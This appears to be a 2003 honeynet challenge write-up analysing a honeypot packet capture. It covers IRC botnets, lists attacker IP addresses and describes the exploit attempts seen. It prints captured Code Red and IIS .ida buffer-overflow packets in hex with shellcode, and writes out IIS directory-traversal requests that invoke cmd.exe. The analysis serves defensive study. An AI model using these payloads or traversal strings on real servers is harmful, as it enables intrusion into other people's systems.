Scan of the Month 27
Nir Hauser
hauserns at georgetown dot edu
April 18, 2003
Tools:
Ethereal: http://www.ethereal.com/
Snort: http://www.snort.org/
A simple rules.txt file for Snort:
alert ip any any -> any any
output alert_fast: alert.fast
Running snort with this ruleset creates a file alert.fast that contains a summary of the network traffic. It also creates one directory for each TCP or UDP session of every IP address involved in the log. This is a powerful tool in combination with Ethereal.
1. What is IRC?
Internet Relay Chat (IRC) is system that allows multiple users to enter a chatroom and chat with one another. It is set up on a client/server architecture. IRC clients such as mIRC log in to the IRC server where they find multiple channels to join. IRC also allows for file transfer and other operations.
2. What message is sent by an IRC client when it asks to
join an IRC network?
First, the IRC clients sends a TCP packet with the SYN flag to port 6667. The client and server then perform a handshake. This is what it looks like:
From Ethereal:
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384
35795 414909.304675 209.196.44.172 172.16.134.191 TCP
6667 > 1152 [SYN, ACK]
Seq=4266393801 Ack=4114925006 Win=32120
35796 414909.305433 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [ACK] Seq=4114925006 Ack=4266393802 Win=17520
The IRC client then sends an IRC packet requesting to use a nickname. Here is the message that the honeypot sends to the IRC server 209.196.44.172:
NICK rgdiuggac
USER rgdiuggac localhost localhost :rgdiuggac
The IRC client then sends a request to join a channel. Here is the message that the honeypot sends to the IRC server 209.196.44.172:
JOIN #xŕéüîéđěx :sex0r
WHO rgdiuggac
Here the honeypot says it wants to join channel #xŕéüîéđěx and it identifies itself as rgdiuggac.
3. What is a
botnet?
A botnet is a collection of compromised computers that have joined an IRC channel. At first, a Trojan Horse is somehow installed on the compromised computers. That Trojan then proceeds to attempt to log on to an IRC server. Once it logs on to the appropriate channel it awaits a command. A botnet can consist of thousands of zombie computers that sit around and wait for an opportunity to do something malicious.
4. What are
botnets commonly used for?
Botnets are always malicious. The users whose computers have logged onto the botnet are always unaware that their computers have done so. A botnet can command all of its zombies to begin a Distributed Denial of Service (DDoS) against a designated computer. It can also order each of its members to attack other computers, install the Trojan, and invite them into the botnet.
5. What TCP ports does IRC generally use?
IRC generally uses ports 6667 through 7000. In this Scan, IRC always uses port 6667.
6. What is a
binary log file and how is one created?
A binary log file keeps track of all network traffic that passes through the host machine. It is created using a sniffer such as Snort which listens to all traffic on the network and records it in the binary file. Snort can then analyze the raw data and present it in a human readable form. Ethereal can read the binary log and present the data in a GUI. Once the log is loaded into Ethereal or Snort, filters can be applied to it in order to extract specific packets.
7. What IRC servers did the honeypot, which has the IP address 172.16.134.191, communicate with?
The honeypot attempted to log onto the following IRC servers:
66.33.65.58
63.241.174.144
217.199.175.10
209.126.161.29
209.196.44.172
as you can see from the following entries:
34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0
35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129
> 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0
35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0
35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0
The honeypot successfully logs onto 209.196.44.172.
8. During the observation period, how many distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172?
During the observation period, 6639 distinct hosts accessed the botnet associated with the server having IP address 209.196.44.172. This includes the hosts that were already logged in to 209.196.44.172 when the honeypot logged on. When an IRC client logs into a channel, the server tells it the names of all the users that are currently logged in. I counted this number. I then monitored all the IRC responses afterwards and used a script to get the usernames of all the IRC clients that interacted with the server. I added these two numbers to come to 6639.
9. Assuming that each botnet host has a 56 kbps network link, what is the aggregate bandwidth of the botnet?
56kbps x 6639 = 371784kbps = 371.784 Mbps
1) What IP source addresses were used in attacking
the honeypot?
The following IP
Addresses were used in attacking the honeypot:
12.252.61.161
12.253.142.87
12.83.147.97
129.116.182.239
141.149.155.249
141.85.37.78
144.134.109.25
148.235.82.146
162.33.189.252
164.125.76.48
168.226.98.61
168.243.103.205
169.254.205.177
172.16.134.191
192.130.71.66
192.215.160.106
194.199.201.9
195.36.247.77
195.67.251.197
200.135.228.10
200.50.124.2
200.60.202.74
200.66.98.107
200.74.26.73
200.78.103.67
202.63.162.34
203.106.55.12
203.115.96.146
203.170.177.8
204.50.186.37-
205.180.159.35
206.149.148.192
207.6.77.235
208.186.61.2-
209.45.125.110
209.45.125.69
210.111.56.66
210.12.211.121
210.203.189.77
210.214.49.227
210.22.204.101
210.58.0.25
211.149.57.197
212.110.30.110
212.122.20.74
212.162.165.18
212.243.23.179
213.107.105.72
213.116.166.126
213.122.77.74
213.170.56.83
213.217.55.243
213.23.49.158
213.44.104.92
213.7.60.57
213.84.75.42
216.170.214.226
216.192.145.21
216.228.8.158
216.229.73.11
217.1.35.169
217.222.201.82
217.227.245.101
217.227.98.82
217.35.65.9
218.163.9.89
218.237.70.119
218.244.66.32
218.25.147.83
218.4.48.74
218.4.65.115
218.4.87.137
218.4.99.237
218.87.178.167
218.92.13.142
219.118.31.42
219.145.211.132
219.145.211.3
219.65.37.37
219.94.46.57
24.107.117.237
24.161.196.103
24.167.221.106
24.197.194.106
24.74.199.104
4.33.244.44
4.64.221.42
61.11.11.54
61.111.101.78
61.132.88.50
61.132.88.90
61.134.45.19
61.14.66.92
61.140.149.137
61.150.120.72
61.150.72.7
61.155.126.150
61.177.154.228
61.177.56.98
61.177.62.66
61.185.212.166
61.185.215.42
61.185.242.190
61.185.29.9
61.203.104.148
61.55.71.169
61.8.1.64
62.127.38.198
62.150.170.134
62.150.170.232
62.194.4.114
62.201.96.159
62.251.129.118
64.17.250.240
64.254.203.68
66.139.10.15
66.190.67.122
66.233.4.225
66.73.160.240
66.8.163.125
66.81.131.17
66.92.135.108
67.201.75.38
67.81.161.166
68.115.33.110
68.152.53.138
68.154.11.82
68.169.174.108
68.37.54.69
68.45.123.130
68.84.210.227
80.181.116.202
81.114.77.37
81.202.125.5
81.50.177.167
81.57.217.208
2. What vulnerabilities did attackers attempt to exploit?
Windows uses Server Message Block (SMB) to allow client applications to read / writes to files on the server and request services. Before Windows 2000, the only way to issue SMB commands was to connect to ports 137, 138, or 139 on the Windows machine and communicate over NetBIOS. Windows 2000 allows a client to issue SMB commands without the NetBIOS through a TCP/IP connection on port 445. When a client wishes to communicate with SMB on a Windows 2000 machine, it usually sends the request to ports 139 and 445. If port 445 responds, the client proceeds to communicate over that port. Otherwise, only port 137 is used. This information is useful, because if an attacker queries port 137 but ignores port 445, it might mean that the attacker thinks it is dealing with a version of Windows older than Windows 2000.
Attackers attempted to connect to the honeypot through the NetBIOS. The NetBIOS is used by Windows machines to communicate over a LAN. File and printer sharing is done using SMB commands over NetBIOS. Many attackers issued a query to the honeypot’s NetBIOS. Once such query looked like this:
1 0.000000 219.118.31.42 172.16.134.191 NBNS Name query NBSTAT *<00><00><00><00><00><00><00><00><00><00><00><00><00><00><00>
Some attackers attempted to map to the honeypot’s C drive through the NetBIOS. This is generally the command used in previous versions of Windows, for this reason, none of these succeeded. That query looked like this:
8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C
Some attackers attempted to connect to honeypot’s IPC$ Share. The IPC$ share is also accessed through SMB. Clients can use the IPC$ Share to send commands to the server. Once an attacker logs into the IPC$ share he can issue Remote Procedure Calls (RPC). RPC is a client/server infrastructure that allows a client to issue commands to the server through a programmer’s interface. Because the Administrator password on the honeypot is NULL, an attacker can log in with full Administrator privileges. The query looks like this:
925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$
61.111.101.78 attacks the honeypot with the W32.HLLW.Deloder worm. The worm connects to the honeypot’s IPC$ share as described earlier. It then attempts a series of passwords including the NULL password. Once it connects, it installs a Trojan Backdoor called INST.EXE. It also extracts the legitimate system utility PSEXESVC.EXE by SysInternals on the victim’s computer. We can see that the Deloder installs PSEXESVC.EXE and INST.EXE in the following packets:
33280 412046.012158 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\PSEXESVC.EXE
33678 412072.276580 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \System32\inst.exe
When we see these packets, we recognize the signature of the Deloder Worm.
Code Red is a self-propagating malicious worm that exploits a buffer overflow in IIS. First, 68.169.174.108 scanned the honeypot to see if it has IIS and is vulnerable to Code Red. We can tell that it is most likey the Retina Code Red Scanner because it issues the following query to IIS:
GET /pagerror.gif
HTTP/1.1\r\n
In the packet ?
65 28542.955886 68.169.174.108 172.16.134.191 HTTP GET /pagerror.gif HTTP/1.1
218.25.147.83 later begins a Code Red attack against IIS running on the honeypot. Code Red uses a buffer overflow to break IIS. It sends the following four HTTP packets.
<packet #1>
32885 396968.463209 218.25.147.83 172.16.134.191 HTTP GET
0000 00 05
69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00
..i...........E.
0010 05 d4
02 b0 40 00 6e 06 6d dc da 19 93 53 ac 10
....@.n.m....S..
0020 86 bf 0e 32 00 50 94 47 ec 82 e7 ec 78 a8 50 18 ...2.P.G....x.P.
0030 44 10
75 2d 00 00 2f 64 65 66 61 75 6c 74 2e 69
D.u-../default.i
0040 64 61
3f 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
da?NNNNNNNNNNNNN
0050 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0060 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0070 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0080 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0090 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
00a0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
00b0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
00c0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e NNNNNNNNNNNNNNNN
00d0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
00e0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
00f0 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0100 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0110 4e 4e
4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e 4e
NNNNNNNNNNNNNNNN
0120 4e 4e
4e 00 00 00 00 00 00 00 00 00 00 00 00 00
NNN.............
0130 00 00
c3 03 00 00 00 78 00 fa 20 20 48 54 54 50
.......x.. HTTP
0140 2f 31
2e 30 0d 0a 38 25 75 63 62 64 33 25 75 37
/1.0..8%ucbd3%u7
0150 38 30
31 25 75 39 30 39 30 25 75 36 38 35 38 25
801%u9090%u6858%
0160 75 63
62 64 33 25 75 37 38 30 31 25 75 39 30 39
ucbd3%u7801%u909
0170 30 25
75 39 30 39 30 25 75 38 31 39 30 25 75 30
0%u9090%u8190%u0
0180 30 63
33 25 75 30 30 30 33 25 75 38 62 30 30 25
0c3%u0003%u8b00%
0190 75 35
33 31 62 25 75 35 33 66 66 25 75 30 30 37
u531b%u53ff%u007
01a0 38 25
75 30 30 30 30 25 75 30 30 3d 61 20 20 48
8%u0000%u00=a H
01b0 54 54
50 2f 31 2e 30 0d 0a 43 6f 6e 74 65 6e 74
TTP/1.0..Content
01c0 2d 74
79 70 65 3a 20 74 65 78 74 2f 78 6d 6c 0a
-type: text/xml.
01d0 48 4f
53 54 3a 77 77 77 2e 77 6f 72 6d 2e 63 6f
HOST:www.worm.co
01e0 6d 0a
20 41 63 63 65 70 74 3a 20 2a 2f 2a 0a 43
m. Accept: */*.C
01f0 6f 6e
74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 33
ontent-length: 3
0200 35 36
39 20 0d 0a 0d 0a 55 8b ec 81 ec 18 02 00
569 ....U.......
0210 00 53
56 57 8d bd e8 fd ff ff b9 86 00 00 00 b8
.SVW............
0220 cc cc
cc cc f3 ab c7 85 70 fe ff ff 00 00 00 00
........p.......
etc ...
<packet #2>
32886 396968.482227 218.25.147.83 172.16.134.191 HTTP Continuation
(hex is not important for this packet)
<packet #3>
32888 396969.003930 218.25.147.83 172.16.134.191 HTTP Continuation
0000 00 05
69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00
..i...........E.
0010 04 93
02 b5 40 00 6e 06 6f 18 da 19 93 53 ac 10
....@.n.o....S..
0020 86 bf
0e 32 00 50 94 47 f7 da e7 ec 78 a8 50 18
...2.P.G....x.P.
0030 44 10
de 1f 00 00 ff ff 8b 85 4c fe ff ff 83 c0
D.........L.....
0040 01 89
85 4c fe ff ff 8b 8d 64 fe ff ff 0f be 11
...L.....d......
0050 85 d2
74 02 eb d3 8b f4 6a 00 8b 85 4c fe ff ff
..t.....j...L...
0060 50 8b
4d 08 8b 51 64 52 8b 85 78 fe ff ff 50 ff
P.M..QdR..x...P.
0070 95 c0
fe ff ff 3b f4 90 43 4b 43 4b c7 85 4c fe
.....;..CKCK..L.
0080 ff ff
00 00 00 00 8b 8d 68 fe ff ff 83 c1 07 89
........h.......
0090 8d 64
fe ff ff eb 1e 8b 95 64 fe ff ff 83 c2 01
.d.......d......
00a0 89 95
64 fe ff ff 8b 85 4c fe ff ff 83 c0 01 89
..d.....L.......
00b0 85 4c
fe ff ff 8b 8d 64 fe ff ff 0f be 11 85 d2
.L.....d........
00c0 74 02
eb d3 8b f4 6a 00 8b 85 4c fe ff ff 50 8b
t.....j...L...P.
00d0 8d 68
fe ff ff 83 c1 07 51 8b 95 78 fe ff ff 52
.h......Q..x...R
00e0 ff 95
c0 fe ff ff 3b f4 90 43 4b 43 4b 8b 45 08
......;..CKCK.E.
00f0 8b 48
70 89 8d 4c fe ff ff 8b f4 6a 00 8b 95 4c
.Hp..L.....j...L
0100 fe ff
ff 52 8b 45 08 8b 48 78 51 8b 95 78 fe ff
...R.E..HxQ..x..
0110 ff 52
ff 95 c0 fe ff ff 3b f4 90 43 4b 43 4b c6
.R......;..CKCK.
0120 85 fc
fe ff ff 00 8b f4 6a 00 68 00 01 00 00 8d
........j.h.....
0130 85 fc
fe ff ff 50 8b 8d 78 fe ff ff 51 ff 95 c4
.....P..x...Q...
0140 fe ff
ff 3b f4 90 43 4b 43 4b 89 85 4c fe ff ff
...;..CKCK..L...
0150 8b f4
8b 95 78 fe ff ff 52 ff 95 c8 fe ff ff 3b
....x...R......;
0160 f4 90
43 4b 43 4b e9 0c fb ff ff eb fe e8 8c f5
..CKCK..........
0170 ff ff
eb 30 58 83 c0 05 55 57 53 56 50 6a 3c 8b
...0X...UWSVPj<.
0180 f0 83
c6 0c 56 68 00 01 00 00 ff 70 08 ff 74 24
....Vh.....p..t$
0190 28 ff
10 58 50 ff 74 24 18 ff 50 04 58 5e 5b 5f
(..XP.t$..P.X^[_
01a0 5d ff
20 90 e8 cb ff ff ff e8 7b f9 ff ff d0 f2
]. .......{.....
01b0 27 6e
f5 18 03 75 4b 3c 43 00 00 01 00 00 78 56
'n...uK<C.....xV
01c0 34 12
b8 78 56 34 12 58 50 8b bd 68 fe ff ff 89
4..xV4.XP..h....
01d0 47 f2
c3 8b 44 24 0c 05 b8 00 00 00 c7 00 4a ff
G...D$........J.
01e0 46 00
33 c0 c3 eb ec e8 f1 f4 ff ff 4c 6f 61 64
F.3.........Load
01f0 4c 69
62 72 61 72 79 41 00 47 65 74 53 79 73 74
LibraryA.GetSyst
0200 65 6d
54 69 6d 65 00 43 72 65 61 74 65 54 68 72
emTime.CreateThr
0210 65 61
64 00 43 72 65 61 74 65 46 69 6c 65 41 00
ead.CreateFileA.
0220 53 6c
65 65 70 00 47 65 74 53 79 73 74 65 6d 44
Sleep.GetSystemD
0230 65 66
61 75 6c 74 4c 61 6e 67 49 44 00 56 69 72
efaultLangID.Vir
0240 74 75
61 6c 50 72 6f 74 65 63 74 00 09 69 6e 66
tualProtect..inf
0250 6f 63
6f 6d 6d 2e 64 6c 6c 00 54 63 70 53 6f 63
ocomm.dll.TcpSoc
0260 6b 53
65 6e 64 00 09 57 53 32 5f 33 32 2e 64 6c
kSend..WS2_32.dl
0270 6c 00
73 6f 63 6b 65 74 00 63 6f 6e 6e 65 63 74
l.socket.connect
0280 00 73
65 6e 64 00 72 65 63 76 00 63 6c 6f 73 65
.send.recv.close
0290 73 6f
63 6b 65 74 00 09 77 33 73 76 63 2e 64 6c
socket..w3svc.dl
02a0 6c 00
00 47 45 54 20 00 3f 00 20 20 48 54 54 50
l..GET .?. HTTP
02b0 2f 31
2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79
/1.0..Content-ty
02c0 70 65
3a 20 74 65 78 74 2f 78 6d 6c 0a 48 4f 53
pe: text/xml.HOS
02d0 54 3a
77 77 77 2e 77 6f 72 6d 2e 63 6f 6d 0a 20
T:www.worm.com.
02e0 41 63
63 65 70 74 3a 20 2a 2f 2a 0a 43 6f 6e 74
Accept: */*.Cont
02f0 65 6e
74 2d 6c 65 6e 67 74 68 3a 20 33 35 36 39
ent-length: 3569
0300 20 0d
0a 0d 0a 00 63 3a 5c 6e 6f 74 77 6f 72 6d
.....c:\notworm
0310 00 4c
4d 54 48 0d 0a 3c 68 74 6d 6c 3e 3c 68 65
.LMTH..<html><he
0320 61 64
3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71
ad><meta http-eq
0330 75 69
76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70
uiv="Content-Typ
0340 65 22
20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74
e" content="text
0350 2f 68
74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65
/html; charset=e
0360 6e 67
6c 69 73 68 22 3e 3c 74 69 74 6c 65 3e 48
nglish"><title>H
0370 45 4c
4c 4f 21 3c 2f 74 69 74 6c 65 3e 3c 2f 68
ELLO!</title></h
0380 65 61
64 3e 3c 62 61 64 79 3e 3c 68 72 20 73 69
ead><bady><hr si
0390 7a 65
3d 35 3e 3c 66 6f 6e 74 20 63 6f 6c 6f 72
ze=5><font color
03a0 3d 22
72 65 64 22 3e 3c 70 20 61 6c 69 67 6e 3d
="red"><p align=
03b0 22 63
65 6e 74 65 72 22 3e 57 65 6c 63 6f 6d 65
"center">Welcome
03c0 20 74
6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77
to http://www.w
03d0 6f 72
6d 2e 63 6f 6d 20 21 3c 62 72 3e 3c 62 72
orm.com !<br><br
03e0 3e 48
61 63 6b 65 64 20 42 79 20 43 68 69 6e 65
>Hacked By Chine
03f0 73 65
21 3c 2f 66 6f 6e 74 3e 3c 2f 68 72 3e 3c
se!</font></hr><
0400 2f 62
61 64 79 3e 3c 2f 68 74 6d 6c 3e 20 20 20
/bady></html>
0410 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0420 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0430 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0440 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0450 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0460 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0470 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0480 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
0490 20 20
20 20 20 20 20 20 20 20 20 20 20 20 20 20
04a0 20
<packet #4>
32889 396969.032378 218.25.147.83 172.16.134.191 HTTP Continuation
(hex is not important for this packet)
The signature of the Code Red worm can be seen at the end of the third packet. It displays the following HTML message to the victim:
<html><head><meta http-equiv="Content-Type" content="text/html;
charset=English"><title>HELLO!</title></head><bady><hr size=5><font
color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked
By Chinese!</font></hr></bady></html>
210.22.204.101 and 24.197.194.106 attempt to exploit IIS vulnerability using a buffer overflow. The following two packets demonstrate 210.22.204.101’s attack: (Notice that the last few lines of the second packet, the attacker attempts to run cmd.exe. This is the Windows command prompt)
<packet #1>
1839 322275.638746 210.22.204.101 172.16.134.191 HTTP GET
/NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
0000 00 05 69 00 01 e2 00 e0 b6 05 ce 0a 08 00 45 00 ..i...........E.
0010 05 dc 6b 08 40 00 6b 06 d7 6c d2 16 cc 65 ac 10 ..k.@.k..l...e..
0020 86 bf 06 8e 00 50 76 16 a7 9e 8b 5a 44 20 50 10 .....Pv....ZD P.
0030 fa f0 f3 19 00 00 47 45 54 20 2f 4e 55 4c 4c 2e ......GET /NULL.
0040 49 44 41 3f 43 43 43 43 43 43 43 43 43 43 43 43 IDA?CCCCCCCCCCCC
0050 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0060 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0070 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0080 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0090 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00a0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00b0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00c0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00d0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00e0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
00f0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0100 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0110 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
0120 43 43 43 43 43 43 43 43 43 43 43 43 25 75 30 61 CCCCCCCCCCCC%u0a
0130 65 62 25 75 62 38 39 30 25 75 64 61 63 66 25 75 eb%ub890%udacf%u
0140 37 37 65 65 25 75 30 30 30 30 25 75 30 30 30 30 77ee%u0000%u0000
0150 25 75 38 33 38 62 25 75 30 30 39 34 25 75 30 30 %u838b%u0094%u00
0160 30 30 25 75 34 30 38 62 25 75 30 35 36 34 25 75 00%u408b%u0564%u
0170 30 31 35 30 25 75 30 30 30 30 25 75 65 30 66 66 0150%u0000%ue0ff
0180 25 75 39 30 39 30 3d 78 26 90 90 90 90 90 90 90 %u9090=x&.......
0190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
etc...
<packet #2>
1840 322275.638746 210.22.204.101 172.16.134.191 HTTP Continuation
abbreviated hex ...
0250 c9 eb f6 fa d8 fd fd eb fc ea ea 99 ea eb 7f ee ................
0260 a8 e9 7f ee 99 fa 5e f2 f8 26 63 6d 64 2e 65 78 ......^..&cmd.ex
0270 65 24 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 e$ HTTP/1.1..Hos
0280 74 3a 20 31 37 32 2e 31 36 2e 31 33 34 2e 31 39 t: 172.16.134.19
0290 31 3a 38 30 0d 0a 0d 0a 1:80....
24.197.194.106 also attempted to tranverse the honeypot’s directories through IIS. Here a few examples of the HTTP it issued:
HEAD /script/..\../..\../..\../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir /system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n
HEAD /scripts/..%\../..%\../..%\../winnt/system32/cmd.exe?/c+dir winnt/system32/cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/..%\../winnt/system32/cmd.exe?/c+dir xe?/c+dir HTTP/1.0\n
HEAD /scripts/..\../..\../..\winnt/system32/cmd.exe?/c+dir c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/..\../winnt/system32/cmd.exe?/c+dir r +dir HTTP/1.0\n
HEAD /scripts/../../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir cmd.exe?/c+dir HTTP/1.0\n
HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir +dir
HTTP/1.0\n
Notice that the attacker was attempted to access cmd.exe. This is the Windows Command Prompt that would allow the hacker to execute commands on the Honeypot.
The attack on the honeypot is a variant of the FX-Scanner. The malicious program:
Sends a ping (ICMP)
Accesses port 80 (HTTP)
Accesses port 57 (no service is known for this port)
Accesses port 21 (FTP)
A series of different IP addresses: 192.130.71.66, 213.23.49.158, 141.85.37.78, 203.170.177.8 aroused suspicion that at FX-Scanner-like program was being used. There are no known services offered on port 57. Yet both 192.130.71.66 and 213.23.49.158 sent the honeypot packets on port 57 and port 80. 141.85.37.78 and 203.170.177.8 both sent the honeypot packets attempting to connect to FTP on port 21. The honeypot did not receive a Ping. I suspect that all these IP addresses were coordinated under one attack, but there is no way to know for sure. It is possible that they were isolated incidents.
210.22.204.101 also scans DameWare Remote Control on port 6129. It sends the following packet attempting to connect with the port:
2052 322422.446563 210.22.204.101 172.16.134.191 TCP 3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0
Many attackers attempted to connect to the honeypot on port 1433 looking for Microsoft SQL Server. The query looked like this:
43 21871.711441 210.111.56.66 172.16.134.191 TCP 1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0
The attackers were most likely attempted to spread the Microsoft SQLslammer worm. On Saturday, January 26, 2003, the worm shut down a large part of the Internet. It uses a buffer overflow to break into MS SQL-Server. Once it infects the host, it sends copies of itself out throughout the Internet.
rpc.statd Vulnerability
A few attackers attempted to connect to the honeypot on port 111 looking for rpc.statd. The rpc.statd program has an input validation problem which allows an attacker to exploit it. This program is installed by default in Linux machines. This is what the packet looked like:
246 146489.407148
204.50.186.37
172.16.134.191 TCP 4069 > sunrpc [SYN] Seq=2674258792
Ack=0 Win=32120 Len=0
A few attackers sent the honeypot UDP packets on port 28431. That port is susceptible to the Hack´a´Tack virus which attacks which includes Remote Access, a keylogger, an IP scanner, and also steals passwords. This is what the packet looked like:
10 6750.116690
62.150.170.134 172.16.134.191 UDP Source port: 28432
Destination port: 28431
SOCKS Vulnerability
A few attackers attempted to connect to the honeypot on port 1080 looking for the SOCKS proxy service. Hackers often use it to bounce packets off of it and attack a third party while it looks like the packets are coming from the victim, not the attacker. This is what the packet looked like:
162 98205.654304 200.74.26.73 172.16.134.191 TCP 25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0
Who
Did What? A list of attempted attacks
Windows 2000 NetBIOS vulnerabilities.
The following IP source addresses accessed ports 137, 139, or 455 in an attempt to exploit the NetBIOS and SMB:
129.116.182.239
141.149.155.249
144.134.109.25
148.235.82.146
162.33.189.252
164.125.76.48
168.226.98.61
169.254.205.177
172.168.0.154
195.36.247.77
195.67.251.197
200.60.202.74
200.66.98.107
200.78.103.67
202.63.162.34
203.106.55.12
203.115.96.146
207.6.77.235
208.186.61.2
209.45.125.69
209.45.125.110
210.12.211.121
210.203.189.77
210.214.49.227
210.58.0.25
211.149.57.197
212.110.30.110
13.107.105.72
213.116.166.126
213.217.55.243
213.44.104.92
213.7.60.57
213.84.75.42
216.170.214.226
216.228.8.158
217.1.35.169
217.222.201.82
217.227.245.101
217.227.98.82
218.163.9.89
218.237.70.119
218.87.178.167
219.118.31.42
219.65.37.37
219.94.46.57
24.107.117.237
24.161.196.103
4.64.221.42
61.11.11.54
61.111.101.78
61.14.66.92
61.140.149.137
61.155.126.150
61.177.154.228
61.55.71.169
62.127.38.198
62.194.4.114
62.201.96.159
62.251.129.118
64.17.250.240
64.254.203.68
66.139.10.15
66.190.67.122
66.73.160.240
66.8.163.125
66.92.135.108
68.115.33.110
68.152.53.138
68.154.11.82
80.181.116.202
81.114.77.37
81.202.125.5
81.50.177.167
210.22.204.101
24.197.194.106
